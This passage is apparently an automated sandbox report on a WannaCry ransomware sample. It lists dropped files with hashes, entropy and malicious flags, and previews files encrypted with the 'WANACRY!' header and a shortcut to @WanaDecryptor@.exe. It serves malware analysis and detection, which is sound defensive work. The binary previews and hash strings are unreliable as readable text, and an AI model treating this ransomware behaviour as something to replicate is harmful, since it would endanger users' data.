                                SSDEEP:12:8HwpzYNbfMQMtUNgsJUoBjAuZoMEwJwU+GtwU+GlmCt:8L+Vcg0AuvE5nG2nGlm
                                MD5:D5ADA753FFB2696EFF2847209F1F5501
                                SHA1:6FF9F1D03DFB0A85CA9EB44E83E7C330AA1578AF
                                SHA-256:62BEC4FD603EFBB85E05335DF2F7EAB315E5A8310822901526F121B2FADC971C
                                SHA-512:7E6A028C69CF82986789CE9A4780B704220C9F7D0554B47FC329CA3A227380EBDEFB885635015F94C29917F071EEA462890E2CAE9A7E1322C4D673844672242C
                                Malicious:true
                                Reputation:unknown
                                Preview:L..................F.... ....{..5...{..5.......................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._.....Y.5....Y.5....t.2......J.. .@WANAD~1.EXE..X......?V..?V.......b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y...........0-.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226533..............n4UB.. .|..o..,........P..#.....n4UB.. .|..o..,........P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.797593287627818
                                Encrypted:false
                                SSDEEP:24:Qe3Lwqwyr9demoQBnSeDKsmcWdC2H0mtCLsh/cO+4yYjX9I3bPjlj:ji4e4+AWdC21gG+vYjMbPjZ
                                MD5:8E2C32EA0DF2819DFEE0939E763A8DBB
                                SHA1:3C70BE2622670B37C07CF4CA9330ADC2E14714EF
                                SHA-256:510FA14834BDB89F1D30A7A8CA7CC29E08CC2F479AEF1D2337D15EB3CE251D5E
                                SHA-512:51D0830DA4BA7D1FDAC35B6AEB315E25F6B264931A5A0D672C74F322C381910DBCCAD39B07B16D029FB480C41A7BC67724EC0595EE5691CE5475959F0A5BF3B3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.838560212151303
                                Encrypted:false
                                SSDEEP:24:bk4Y1mu/rGu+UD0k+QYq0Ql1/fyhd3UUGcuB2673GWBQejO3Zi3Z:bk4Y1mCyuPAk+QYTQlJIdKcuv3PLb
                                MD5:2DF793EED7E120797D5EF9CA06DE83BD
                                SHA1:A3001D1AF96B6392D88E7AE7129B00B95F2B73A4
                                SHA-256:A22291F5F9639E818C052A31B97C26A1B9666E4D89985AD4E534296B849FCEE3
                                SHA-512:B3B4DCC237B638F3673ADEFA41ACC0521F6967FEEF0C2DCCB0800FCD18F18D58E41DF6443DA06BB5D70F36AF555348AE2EDCFE13ACF83F491397A7B009355ADA
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.83354903957755
                                Encrypted:false
                                SSDEEP:24:GtwVnN2yO3IaZHxTu0/1NS08de5HvYAxsWjGOAxEg:nVNi3IaVxb4+DGzxEg
                                MD5:E2099EDA47B2EB1CB2D4442C3131FAB5
                                SHA1:37264F0B9F133220D96082383517AFB19E4254B5
                                SHA-256:7A755E56985124B024D5579B7BF9C2FF387BFDECA351110D220ABCDD6C891606
                                SHA-512:5A6C1D1C24752E516E250FE6757F2D6B0155D3DECF16454D0613F062AD7735652FD2E61D21BA8F0B589B87C14B64C1ACF7965F5EFE4388DF6127DDEFBFB5AE27
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843810693250143
                                Encrypted:false
                                SSDEEP:24:bkmBF93xchgaSjWlUEP0HLkqL5xvmx2hZXYCyzOtP/TBGBfu83f88IZ:bkwSSjj+P0Hpxe6YA/I5IZ
                                MD5:69D5C55CA2078254961237D960EE1B22
                                SHA1:FFFA8758D065F282691BBDC11940FBA244AC78EB
                                SHA-256:2CB595A4837C63BFEE70523AD52C93F73A0575752BDF0674AD8E3F1EB346B3C7
                                SHA-512:87F013F912288DB0D066D9401C400CD9BF48A6CD3891381A99502D51854D687986C699B72A8DC1211EC30F744E3DC51D1E908D2CB3415F3D3DC1CBE8002D3018
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.796914217785424
                                Encrypted:false
                                SSDEEP:24:I4by4xaIU/vDoL4ICopsP26kV6ZrxYOOrjgm35RHtnD/uKVXzJu9EKMNC0U:IGyfZTRICcqR5ZSngsftaKVXEWbNC0U
                                MD5:44BC996846993CFDBA52B7D5376C7A05
                                SHA1:8B247D2D30C83B2287071CC644EF96D94E15B146
                                SHA-256:5ED6EF496DC692CBA9E4882E8C4F292DE29C3327CF5255B2E85274617F4848DD
                                SHA-512:B201031B83BA9A702E3CF111005A1E988EAE9B6EEB7C9FD75EDB054E2496A1F057F56A44BDB710C5A4B0FDAEA7CC21672D027FF68D9FD9DC634816718676DCB1
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.85706292274075
                                Encrypted:false
                                SSDEEP:24:bkGZ7kH067siOKeE9gtvO1S9naDgdIfXl6rkz0tJDjstRmT2iV6xLwckSH:bkekUksi7n9g81Ka8dI3Oe61V2LwE
                                MD5:1B42A874189D57FD31CF46C0A739578B
                                SHA1:2A20525A31A548D8D7CB955D739429E6BA147FC0
                                SHA-256:37A2C2EE9A01CB6C7331B4B3166D4DF2A44B8EBB16E358FA5EB4AD2E838DB5A2
                                SHA-512:691BEC558336791DBF1BBF8660D26E46A4D3CD8F95E22FF132DA4758F6C5247A07C21BAA44AADC769D65203866402F5849D67C5A7DCC347208176DC10EE28AAF
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8008989769724195
                                Encrypted:false
                                SSDEEP:24:wrd13fGPdKgrvloWlaO0kbJR++CKrU7h7wYLk/cF9:w3ngrJEkbHE+UdMYsM9
                                MD5:5E6B73BF9010DB9F5CBC68A273A85B66
                                SHA1:F11431C6EBA416608F412A0CB5EB739C57D3C344
                                SHA-256:58154789B389BA364622873661907F5C9C5D73793702B0D5665525FF5CC9C4AB
                                SHA-512:FEB589BC02C76FCBD0243FEC47BBD0A080E0BEA0557703FBEAEF7879B659A8C163E5893E8EF7A5E99B536DBFF0470A32F0FC9684696220A32D56F7EDC90E2790
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845997200646745
                                Encrypted:false
                                SSDEEP:24:bkddBWKj7YxrKatpYwLY9xeELzaPoJAUiZcSaoL7dU2yReTUHow3xeBwBYIA:bkMKv6u6pYsKL2PqZinLI4TUIw3xe8Yp
                                MD5:1F775F4A8934A7D95D3BDC73F7C437B7
                                SHA1:1307B2ECF1CE5CAF273604A71D514CCE2436A170
                                SHA-256:87EA2C57DF6685C6F9FFAC91018B77FC44F79A1130C8FBD690C1890D942228AF
                                SHA-512:A58554B2646B859163E5B9402A3F61E3005421B541604698D00D796D41F6A7FF5C75FA5499951A9B1E926C7E072E82F5F9247B9B37C05C94DD69BB27F52A59BD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.828589881678447
                                Encrypted:false
                                SSDEEP:24:UtSNpPyyo4FyktuOH7LdoX/53LlWyJiE4WpRnmUTJ5p15F4R:4SNp6yomfc0dox3Ll4kBmUDM
                                MD5:C0159297ADFF3043A6F4851207B6E825
                                SHA1:520D2F9E16BD5506715DE1991B17147462C437F9
                                SHA-256:A673CE8DFA0E147EAB0CE46E2AA80AEBBBDD13F76A6AD2B3D9D2E0AF647BEC0D
                                SHA-512:E0E6420EDAA066A803FD89654134664B1CD586F1101F8AAF8D0477EBA30AC9E7D71DAAAE7A1C94EC53E62364A689E85BBB9EF526A2E768DE50CD3C5530F3547B
                                Malicious:true
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861849899411367
                                Encrypted:false
                                SSDEEP:24:bkb+sC0MvgZzIovS38OQ2xUIovWnnGK/J3dIKJg9JDfWlBvzG4YHYMNvPd:bk6x0MvGzbvSMO9ovf2J3w9Bf0Bv1g9F
                                MD5:F1A799705C6CDD78F840842DF538D1DA
                                SHA1:44EAC4B053F4E2589409ADE5783CED7001B282A3
                                SHA-256:57295381D9ECC86FACFA39E3D6231DA868E60254BBC9A525E8A63ADA0FF8B548
                                SHA-512:31C53FC2E00C3E8C1840FE3132E228C1DF234D84053EB796CC0D3FD0A609D5AD9B4ECE2136B4DA88CF780B78F60E7593A355CBF88BAEDBF8209569CB76D37B32
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.76407204195986
                                Encrypted:false
                                SSDEEP:24:xTzCQS7Ws7Qesi6+DebxRNtKa6vXIHxU6B6qUzspqBc:hzCQS7Ws0esiRKbnNtKtXIRAzVBc
                                MD5:634F1DD4C6AF029CAB462C1107EB05D9
                                SHA1:15DA13FE2CF6FF9377EF0E30791439B4EFF1F9F7
                                SHA-256:494805B069E5C1D686F4BC7F394C3F809278E3E58AFF3EA9303902DCC1F96BA9
                                SHA-512:FBC602E8B84A04E49A6A88963403DFD42A3C621ED9B8C52AA01A4411FE88C1F47A41B552BF7B16F332B01C87F46D030B511D632EAAA58C37283F83A619B116AE
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.824938057904074
                                Encrypted:false
                                SSDEEP:24:bklnkAsU1j9Gbai71jfkGWLJCHclRyv/oD0r845nB5/kOcJjhImc39g00Flb:bkVk41BkdcGWLJC8qv/Xr84h/ZVD+00T
                                MD5:4249B0518FFCECE2B06C3635E45CC0C6
                                SHA1:621E0AD5B86017C732D59EFE452575957B40DCBC
                                SHA-256:4D56FA0D0D92D0C9D188CF88D305C8CA9A950E840F6CBA7F3AE29A70A95C9981
                                SHA-512:44E1C3887ECAC7783B107531A00803F181C2F246F455766FC4A9467D9D81BBE2FD38F07F8389897FF41D9E63E6C820DAFA72FB2232BF41CB2837823AC4AA3283
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.837820223992027
                                Encrypted:false
                                SSDEEP:24:HrHe6lSzLqoGqcUJQtKromIHlvAnUQoRP7V:HywSz3GqcUatOkxAncPR
                                MD5:4E06EE805B6418DBF2619865A82795D5
                                SHA1:84F8B87158C777BB8196152AB3E0AF32E5469A52
                                SHA-256:083EA69930A8A2D96C084D421620137C3CD9E8CE8DCBF563D345203076E93518
                                SHA-512:4FB32607050A78D47EBD85A9CD7B605178EF5EEE0E500159B9080EC737B1431FAFA434D0C181741140291761FFCDE83BE7DFCA1A44B4BC9C1523C48E91C9929C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.83677576965376
                                Encrypted:false
                                SSDEEP:24:bkqbMf4wJTopgGDAb8ZfWX5dlE6qc7ifixNoh4tBPO27SCKLyttg4:bkqbMtTlAJWX5nrCiLG27pKLy3j
                                MD5:02A56183CB70CB85B9DA1A64E43B25AB
                                SHA1:85B4B93ACB753767BB06CA5129C93070960A882E
                                SHA-256:FF673CD1FA71EA96F60DB64A3531FD81166F1FC44514525D8D6358DB82DB9528
                                SHA-512:48A806C1AB634D95A363A223559F078C1FB54E9EF37EC3E71BEEA1D29DD1EC11A3945FBA7ABB665B49A74DE1D52DCB34EB0F3F7FF11A9204801385F282AA3506
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8083849960197
                                Encrypted:false
                                SSDEEP:24:Sxl8NHhKKLPXIdst2D75YRikr5JTdrtHgjTCaUNpCl:SoBK+05YRHrXTDHO2Npa
                                MD5:857A0F426BD07D4B6821AB6518D5676A
                                SHA1:BB5CA9DFACDFF75AB5CDFF0ECD96BB24C395C3EA
                                SHA-256:8D25A9D900AA495F6110BC39CD296F965E7F612BC9C769DBE0D169BD06F94557
                                SHA-512:3920A28AAAE99B91DC1F8AB01004264165CE73A5ED15090D4E26D485EF70B98210E548695E09AAF2CBB6621294DFFC13B164A11C73B272B0BC0E3D00F5058B31
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.819828650073252
                                Encrypted:false
                                SSDEEP:24:bkYrLQglYGjbgOV7JcV/U+IlI9tqCPiMgU+TI9EmRfOtuK61cEM/f859:bkYrllYOejqC3cTIpf0HEj9
                                MD5:0C1E41871BE663F7E98158A3718F3DA1
                                SHA1:328E3D083128800D308EB47DBC31686C69582FF7
                                SHA-256:2D9AA64E5E3DDB650611E25699188AA371C1BE9BE57E412AAE59CD26EE849234
                                SHA-512:4EB5791CEDCAE97BDAE9CD58B3BA66BC1BEC2922E2B6465CA37A3B3AEAF0C30997F293E32BE2595B0585A1BFBDC384C16AD6537E361546465E09A5CE2A8DF90A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.......Bb.....=.KNNq.8.I.o..@....Z.o.jm...&.s)F..$}..>...a9..e..2...|.g.u.Sa.@..t.....QGb.....z.3>..}.c.#...f..eR..x@.....e-...wG........`O.o...+A-.L......:..}/s.z...4.......zC]&o.Q*,.|^:..PO..G.......=D.F......b.....l...x.{...X*O0i'..Y.k.b...............\.d.."9.ft..$Y.e.Hp..:0...+..tg.......J.x..5y._.9...P..F...+Ai"......S...}..<_u.D.,@lygZEZ.....O..X(@H.M.7C....O..C..@....5.Y...}9Y,...*....E`O...O.|E.......BbU...T(..W<F.Q.y1.....Yt6...ss...K....S%..99\.*...*.*.._ ........ky.ib..O?:7^/A-.f^uq.-G 5.}f].?.^0..U...w.=...U ......W...&...d.0.c.c5/Q............R~....cd../a.....w..&d...D.....B.o...R.v..J3#....t.9.R.=.....pAmjsU.O Z.#O.?....U.Z.8..e...E..q{...>..J..."m...V~R9Ga|.....3.e..stt....z.V.Ve..Iv..Z.......|.....\....n5.l}a.)6..OO...b0a.:.*.*J..?..`t....XD..$....vH..}.(.X(..cZ.&7..{....A...%.?..z.|8.!."E'.c`.e4.>....u...$.TJK.I..F.b...p...hY2.iG.0.8.f$.W(....G..]..C.7).J..Y...kD.LeM<2....p....^>.{..aO.....O<8.\P.......ix.G.
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.819828650073252
                                Encrypted:false
                                SSDEEP:24:bkYrLQglYGjbgOV7JcV/U+IlI9tqCPiMgU+TI9EmRfOtuK61cEM/f859:bkYrllYOejqC3cTIpf0HEj9
                                MD5:0C1E41871BE663F7E98158A3718F3DA1
                                SHA1:328E3D083128800D308EB47DBC31686C69582FF7
                                SHA-256:2D9AA64E5E3DDB650611E25699188AA371C1BE9BE57E412AAE59CD26EE849234
                                SHA-512:4EB5791CEDCAE97BDAE9CD58B3BA66BC1BEC2922E2B6465CA37A3B3AEAF0C30997F293E32BE2595B0585A1BFBDC384C16AD6537E361546465E09A5CE2A8DF90A
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.7953074191376945
                                Encrypted:false
                                SSDEEP:24:QX+sjMfbLWxliy0FXncFeFohUnbRT6GHOoRFZGA:u+sozyxlmCeFoOntFX
                                MD5:BA278896F592DD6B57156511FDB44111
                                SHA1:0F94215CC2B26293D4F978DBE2028618A7A96892
                                SHA-256:B65B93C1892A937C4F8A322D032A297DFF24E94666E1A7663F6F4BF8A9ABDAB1
                                SHA-512:BC10FFCB587424CED3593594EACEFA2923411974F3375289A791E0E9E64B438DB645F3270F7A29707867D134BC1C2ADA28569FDDDF31DCD86B5129461ED1BC83
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852894009710244
                                Encrypted:false
                                SSDEEP:24:bk/74lNEpa1E0qlWy1GIryE+eaH0kR+J4WLMFl5eC36rh4Hjty1Pg2HRex:bk/7a/1EjlWy1Gy9+/H9hWIPZKt4Hhs6
                                MD5:3575FCCAA8A66B9B0FB88D4CA5878C39
                                SHA1:002484501C9EC54B5AF137537E86158034F57637
                                SHA-256:884BB6358A2BB27612B662F45FFE4523DAE2D2F206F0BBB605213279723DDF78
                                SHA-512:3ADB2F4B7AB470A30F5B842BD72D4318A5CB6DC8F4F57F81452B8E4DB76E2076B93D5332B58C8D52CA5267EFAFF5040E21B713CC7989B7DBD4650FDAAA87495C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852894009710244
                                Encrypted:false
                                SSDEEP:24:bk/74lNEpa1E0qlWy1GIryE+eaH0kR+J4WLMFl5eC36rh4Hjty1Pg2HRex:bk/7a/1EjlWy1Gy9+/H9hWIPZKt4Hhs6
                                MD5:3575FCCAA8A66B9B0FB88D4CA5878C39
                                SHA1:002484501C9EC54B5AF137537E86158034F57637
                                SHA-256:884BB6358A2BB27612B662F45FFE4523DAE2D2F206F0BBB605213279723DDF78
                                SHA-512:3ADB2F4B7AB470A30F5B842BD72D4318A5CB6DC8F4F57F81452B8E4DB76E2076B93D5332B58C8D52CA5267EFAFF5040E21B713CC7989B7DBD4650FDAAA87495C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.775590767587589
                                Encrypted:false
                                SSDEEP:24:faQaPQUxJDStDb7Iepqw9woqR/3ZwbQEuXwuj2ryPF9V:WdLDmDbkeprCoSvziu9L
                                MD5:A87FD8DC63F55618FFCCDDE740DCCB5B
                                SHA1:720165BD6DC7E996CD751DB371ED55735C3F8898
                                SHA-256:E6879535FFDE434E12FB115811E99A989A960576B924E54EA7C1C0B580E24172
                                SHA-512:5E7A1A3B9E756B53421756C4523DD6E1C86C8DD7024E80BD273B5BCC4BF75F0E56A7B0574DAB1CA70CF3E160E2BD8710E553B4BCB5757BAE1BEA831FDC509965
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861977656314873
                                Encrypted:false
                                SSDEEP:24:bkTl30jOsdiTP3aYZIibZLAuCPU00uXK3nv0G8lFXsYn+cElkJ4lU:bkTlkjhgpFP9uXsvGFcsElrU
                                MD5:15DBA1A0595A59D3238DD005AD92750C
                                SHA1:AB3AD6DB0D16EB6CC584E89C095A25385A09CCAC
                                SHA-256:1323D3AF25618D6828B1730F82612A2E72F1715FC3CA9BF67A6AC848D49379BF
                                SHA-512:18668B861B5F568AC3169B519ADE7689212379A0B444268C91328BAEA9BD3FC5F8568D551C325DCFBE2766CEDE949AB568B81EA38C380F74137EBCA05F887AAA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.861977656314873
                                Encrypted:false
                                SSDEEP:24:bkTl30jOsdiTP3aYZIibZLAuCPU00uXK3nv0G8lFXsYn+cElkJ4lU:bkTlkjhgpFP9uXsvGFcsElrU
                                MD5:15DBA1A0595A59D3238DD005AD92750C
                                SHA1:AB3AD6DB0D16EB6CC584E89C095A25385A09CCAC
                                SHA-256:1323D3AF25618D6828B1730F82612A2E72F1715FC3CA9BF67A6AC848D49379BF
                                SHA-512:18668B861B5F568AC3169B519ADE7689212379A0B444268C91328BAEA9BD3FC5F8568D551C325DCFBE2766CEDE949AB568B81EA38C380F74137EBCA05F887AAA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.820509222168795
                                Encrypted:false
                                SSDEEP:24:39KzdSgr0wo86R0cM5fQ5YlNcn1rr+A8ISMcCX8PZ:3buwOcMq5mNcn1rqwSMcCX8x
                                MD5:5A6E07C6E3DD1EDFEB8547D83522E015
                                SHA1:4E28188EBE1AC8FB3E310CA41B498B424AF138B8
                                SHA-256:0FF075EC400A01D6B9EFE24C1A273E5243FF7C36FF27F5C7AD5C6FE63D132BF0
                                SHA-512:72DB5B1AB82A48135EF187C9C80D13A9ECC59705FCA39984A335AA62DA62E05B2E144710F3568D911E22D5C38A1268358D692954A81CF259F2027F6F5222A715
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84798486393852
                                Encrypted:false
                                SSDEEP:24:bk8DjUrCieru7h3urwK4ogzkZTs0j3SwFyECLnAdHQP14aJu93ymMPARzM:bk8DwCidVW4ogkAECUUdJY3yhoRA
                                MD5:731F66A59E24AC0D621688B11FCD2A81
                                SHA1:5CA649D120C01F7890C2F9D1091B94307F127989
                                SHA-256:FED43A396EF50C40E82678E15BA3B62E6EFFB26559CA1B2735A992764BA591B5
                                SHA-512:14059E29D8BA23EE9CD12F037B240787B4C51CEB75BD75C64377B7C7CD060349577BD2566E1497C8F5CB0EF302D5A407EA4C3B5FD2427EE7933498FC82C507D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84798486393852
                                Encrypted:false
                                SSDEEP:24:bk8DjUrCieru7h3urwK4ogzkZTs0j3SwFyECLnAdHQP14aJu93ymMPARzM:bk8DwCidVW4ogkAECUUdJY3yhoRA
                                MD5:731F66A59E24AC0D621688B11FCD2A81
                                SHA1:5CA649D120C01F7890C2F9D1091B94307F127989
                                SHA-256:FED43A396EF50C40E82678E15BA3B62E6EFFB26559CA1B2735A992764BA591B5
                                SHA-512:14059E29D8BA23EE9CD12F037B240787B4C51CEB75BD75C64377B7C7CD060349577BD2566E1497C8F5CB0EF302D5A407EA4C3B5FD2427EE7933498FC82C507D7
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.830566393939644
                                Encrypted:false
                                SSDEEP:24:Nv8rKdYhXeAtJzwPLMmqWZMNyJoAD2XUHsFyp1IXLv+l:x6nhXRzzA8WZMNyv7Hkyp1YLv4
                                MD5:F34E56D59DCBCECCA58147D35B6F0416
                                SHA1:6BF0DF358E18DBBAC3E59351A0ECA82E514F5840
                                SHA-256:AD04F4971949C0A60EEEDB4B84829805DDE83A0736F0E35C46AC919C69EE8DBC
                                SHA-512:A8AAAC78E102B49EA3CA4886DDD5452BAFAA2940A372D7540AB425CA972DE29AE7079419BE06573D468437CBB449F64C9D64038EF12CE36219240018FEC825DD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852421999394759
                                Encrypted:false
                                SSDEEP:24:bkse+wdIBoWVvWGJW/4ZamTSoTSsvpiVxfN3zNtI3v+WfGsClzC5w+z6iHQNALfg:bkse+oIZ8oa5oTSOExFnI/+YGG5wsH25
                                MD5:B8EB9958A5A2471D0088BAE2C2EDFA36
                                SHA1:21272BB542FD31193C6B28B3FF9136FB33CF44AF
                                SHA-256:3B10E553707E7F9260C1474816DBDE1032179535701118992EE27C9AD42F5B0B
                                SHA-512:7081BFDF575B6F3ECB2476F5159F00051CD506B54B7A10689378EA62074DE8E073757D05246B577929A85C4CA165004E20A9F94ED175EB4E48B2B01564C31F34
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.852421999394759
                                Encrypted:false
                                SSDEEP:24:bkse+wdIBoWVvWGJW/4ZamTSoTSsvpiVxfN3zNtI3v+WfGsClzC5w+z6iHQNALfg:bkse+oIZ8oa5oTSOExFnI/+YGG5wsH25
                                MD5:B8EB9958A5A2471D0088BAE2C2EDFA36
                                SHA1:21272BB542FD31193C6B28B3FF9136FB33CF44AF
                                SHA-256:3B10E553707E7F9260C1474816DBDE1032179535701118992EE27C9AD42F5B0B
                                SHA-512:7081BFDF575B6F3ECB2476F5159F00051CD506B54B7A10689378EA62074DE8E073757D05246B577929A85C4CA165004E20A9F94ED175EB4E48B2B01564C31F34
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.816065791627852
                                Encrypted:false
                                SSDEEP:24:XA/QelHQdzx7sNJMHdzY3ACH7mfWfi/TYr5WBcC+sgx4iqINeW8Tt:lelHQd14DtwCyefcMWJtgjNb0t
                                MD5:BF4C2365BB9FBCD1162E1EC258549B0C
                                SHA1:561D6664F94B1297EB4F006EBD2AE32E357B3B25
                                SHA-256:B73EDB43F6A87BF019147BAAEF3EE4EFAD7ADD9EA407D3C8E86C958D9FC2C6D5
                                SHA-512:07E49F772AF37F485224C6A796F6777638DEBDF07C943D989CA860256305757A52EC58CF665EC382175C55C2A95EB55B0C3CD8C53EF37A8323A38A5C0FC6B50D
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8513655148042405
                                Encrypted:false
                                SSDEEP:24:bkVAplgZkxMWd1FCVuVQLDKlXEmfx4CyOptAY/FcOHMYUtqll7XzqYJ4HT0fwxXp:bkAlJxMaPCilJx4ZOpmwcYiqlNzqaoY+
                                MD5:29103ADBB9F0BC61F9D18503A697F59C
                                SHA1:59EF2D4079378F54E0760B916ADBF35D37208D94
                                SHA-256:299EF53E107792794618C4E380107FF1A45EA52CFABBCCD88F937876959A523B
                                SHA-512:710DD51A1727D24BDF7E29A453CABDE874CE67686CD3CB88FEDB4A9772C2A96D7C5648056AF09214BB76B13F5E5C836052AC825FB28AAEA8001085F469F9F030
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.8513655148042405
                                Encrypted:false
                                SSDEEP:24:bkVAplgZkxMWd1FCVuVQLDKlXEmfx4CyOptAY/FcOHMYUtqll7XzqYJ4HT0fwxXp:bkAlJxMaPCilJx4ZOpmwcYiqlNzqaoY+
                                MD5:29103ADBB9F0BC61F9D18503A697F59C
                                SHA1:59EF2D4079378F54E0760B916ADBF35D37208D94
                                SHA-256:299EF53E107792794618C4E380107FF1A45EA52CFABBCCD88F937876959A523B
                                SHA-512:710DD51A1727D24BDF7E29A453CABDE874CE67686CD3CB88FEDB4A9772C2A96D7C5648056AF09214BB76B13F5E5C836052AC825FB28AAEA8001085F469F9F030
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.829968915408538
                                Encrypted:false
                                SSDEEP:24:54hJCMEUtD6JAVAY6vyII11yQJQpWKgQS+UXKk:5T9giBtyIIXylnWKk
                                MD5:27A49D9ECC46648125A673BDF43543E7
                                SHA1:47D8EBA2EDBB3C3EFB9C49CDB8D070A8CDB34C96
                                SHA-256:A952D25E654BC37E5CB0233D0C134C52CB1A4EF3F547B3BE2F313FA993C25C5A
                                SHA-512:B899D2B70327D81BA19E056756F247AE3A0945DBBE9E2051F75820E8CC3757CDB6876389D1863B4698A3AD80B52B155225002A35968C6B69A7F2E5682B1AF8AD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.84313455810191
                                Encrypted:false
